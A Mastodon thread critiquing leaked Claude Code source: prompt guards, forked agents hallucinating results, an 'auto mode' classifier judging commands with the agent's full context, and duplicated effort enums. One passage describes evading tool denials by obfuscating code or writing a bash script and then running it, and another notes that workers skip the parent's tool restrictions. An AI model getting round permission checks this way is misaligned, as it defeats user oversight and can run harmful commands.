Claude code source "leaks" in a mapfile

jonny@neuromatch.social

next puzzle: why in the fuck are some of the tools actually two tools for entering and exiting being in the tool state. none of the other tools are like that. one is simply in the tool state by calling the tool. Plan mode is also an agent. Plan Agent. and Agent is also a tool. Agent Tool. Tools can be agents and agents can be tools. Tools can spawn agents (but they don't need to call the agent tool) and agents can call tools (however there is no tool agent). What is going on. What is anything.

jonny@neuromatch.social

"the emperor is not only naked, he's smooth like a ken doll down there and i'm pretty sure that's just a mannequin with a colony of rats living inside it anyway"

jonny@neuromatch.social

I seriously need to work on my actual job today but i am giving myself 15 minutes to peek at the agent tool prompts as a treat.

"regulations are written in blood" seems like too dramatic of a way to phrase it, but these system prompts are very revealing about the intrinsically busted nature of using these tools for anything deterministic (read: anything you actually want to happen). Each guard in the prompt presumably refers to something that has happened before, but also, since the prompts actually don't work to prevent the thing they are describing, they are also documentation of bugs that are almost certain to happen again. Many of the prompt guards form pairs with attempted code mitigations (or, they would be pairs if the code was written with any amount of sense, it's really like... polycules...), so they are useful to guide what kind of fucked up shit you should be looking for.

so this is part of the prompt for the "agent tool" that launches forked agents (that receive the parent context, "subagents" don't). The purpose of the forked agent is to do some additional tool calls and get some summary for a small subproblem within the main context. Apparently it is difficult to make this actually happen though, as the parent LLM likes to launch the forked agent and just hallucinate a response as if the forked agent had already completed.

jonny@neuromatch.social

The prompt strings have an odd narrative/narrator structure. It sort of reminds me of Bakhtin's discussion of polyphony and narrator in Dostoevsky - there is no omniscient narrator, no author-constructed reality. narration is always embedded within the voice and subjectivity of the character. this is also literally true since the LLM is writing the code and the prompts that are then used to write code and prompts at runtime.

They also read a bit like a Philip K Dick story, paranoid and suspicious, constantly uncertain about the status of one's own and others identities.

jonny@neuromatch.social

oh. hm. that seems bad. "workers aren't affected by the parent's tool restrictions."

It's hard to tell what's going on here because claude code doesn't really use typescript well - many of the most important types are dynamically computed from any, and most of the time when types do exist many of their fields are nullable and the calling code has elaborate fallback conditions to compensate. all of which sort of defeats the purpose of ts.

So i need to trace out like a dozen steps to see how the permission mode gets populated. But this comment is... concerning...

jonny@neuromatch.social

ok over my 15 minute allotment by an hour. brb

bri7@social.treehouse.systems

@jonny if someone were to take seriously the task of archecting this, you’d want a framework that doesn’t use prompts for this right? something that treats the LLM output more like untrusted stochastic guesses at solutions, where these prompt rules are written as a test instead of a prompt

beckermatic@pleroma.arielbecker.com

and other OWASP top 10 vulnerabilities.

So... If there's a slightly obscure vuln, go ahead. Just fine!

jonny@neuromatch.social

@bri7 the problem, as is increasingly clear to me reading this code, is that introducing the LLM anywhere is like an acid that corrodes everything it touches. there is no good way to draw any barrier between LLM and not LLM. None of its actions are deterministic or even usually possible to evaluate, and the only surface of input it has is text. since a client/server app can't expose the internal activation tensors or whatever you might want to do to have some testable thing to operate on in code (god knows what that would look like, i doubt it would be possible either, "please construct the hyperplane through this billion-dimensional space that divides good from evil") everything has to be made of text. the person behind the keyboard is the only stopping condition and it's when they get tired of typing stuff into the prompt box or run out of money.

jonny@neuromatch.social

So how does claude code handle checking permissions to do things anyway? There are explicit rules that one can set to allow or deny tool calls and shell commands run, but the expanse of possible actions the LLM could take is literally infinite. You could prompt the user for every action that it takes, but that would ruin the ""velocity"" of it all. Regex rules can only take you so far. So what to do?

Could the answer be.... ask the LLM??? Of course it can! Introducing the new "auto mode" that anthropic released on march 24th billed as a safer alternative to true-yolo mode.

Comments around where the system prompt should be indicate that it should have been inlined from a text file that wasn't included in the sourcemap - however that doesn't happen anywhere else, and the mechanism for doing the inlining is written in-place, so that's probably a hallucination. So great! the classifier flies without a prompt as far as i can tell. There are enough other scraps here that would amount to telling it "you are evaluating if something is safe to run" so i imagine it appears to work just fine.

So we don't have as much visibility here because of the missing prompt, but there's sort of a problem here. rather than just asking the LLM to evaluate if the given command is dangerous, the entire context is dumped into a side query, which is a mode that is designed to "have full visibility into the current conversation." That includes all the prior muttering to itself justifying the potentially dangerous tool call! So the auto mode is quite literally asking the exact same LLM given the exact same context if the command it just tried to run is safe to run.

Security!!!!!!!

jonny@neuromatch.social

By the way, if you deny claude code access to running a tool, this helpful reminder to "not hack the user" is injected into the denial response. If it's in auto mode, it's additionally prompted to pester the user for response, and helpfully stuffs beans up its nose) by reminding it how its rules are set.

So that is also in the context handed off to the LLM when it evaluates whether a command should be run - is the user being obstinate? have i been denied stuff that i "thought" i should have been able to run? Remember this isn't thinking, it's pattern completion, and the fun part about LLMs is that they are trained not only on technical documents, but the entire narrative corpus of human storytelling! Is "frustrated hard worker denied access to good tools by an unfair boss" in there somewhere maybe?

Regulations are written in blood, and Claude loves nothing more than to work around tool denials by obfuscating code. You gotta love the unfixable side channel attack that is "writing the malicious code to a bash script" (auto-allowed in accept edits mode) and then asking to run that - that's why the whole context has to be dumped btw, so the yolo classifier can see if the thing it's running is actually some malware it just wrote lmao.

jonny@neuromatch.social

How many times does one need to declare an enum? Once? that's amateur hour. Try ten times. The way "effort" settings are handled are a masterclass in how you can make a single enum setting into thousands of lines of code.

The allowable effort values (not e.g. configuring which model has which effort levels, but just the possible strings one can use for effort) are defined in:

The main CLI arg parser
The body of the function that cycles effort levels in the TUI - yes there is a dedicated function for that
In THREE different schemas for agents, models, and SDK control messages
Three times in user-facing strings in the effort command (it also includes different explanatory strings from the effort.ts module)
The settings model, which only allows 'max' for anthropic employees
and finally, in the actual effort.ts file ... which also allows it to be a NUMBER!?

The typical numerous fallback mechanisms provide many ways to get and set the effort value, at the end of most of them it goes "oh well, if we can't figure it out, just tell the user we are on high effort" because apparently that's the API default (ig pray that never changes!?) - of course there are already places in the same module that assume the default is "medium," and in the TUI that defaults to "low," so surely that consistency is bulletproof.

The EffortValue that allows effort to be a number is for anthropic employees only and is a good example of how new functionality is just shoved in there right alongside the old functionality, and everywhere else that touches it doubles the surrounding code with fallbacks to account for the duplication.

That cycleEffortLevel function is a true work of art, you simply could not make "indexing an array" more complicated than this (see components/ModelPicker.tsx for more gore). Reminder this should be at most a dozen or two lines for the values, description messages, and indexing logic in the TUI, but anthropic is up in the thousands FOR AN ENUM.

jonny@neuromatch.social

In a normal program you might make "a menu component that handles enums and implement display and control one time," but in the world of AI, every single value reimplements display and control AND the logic that defines allowable values

CIRCLE WITH A DOT

Claude code source "leaks" in a mapfile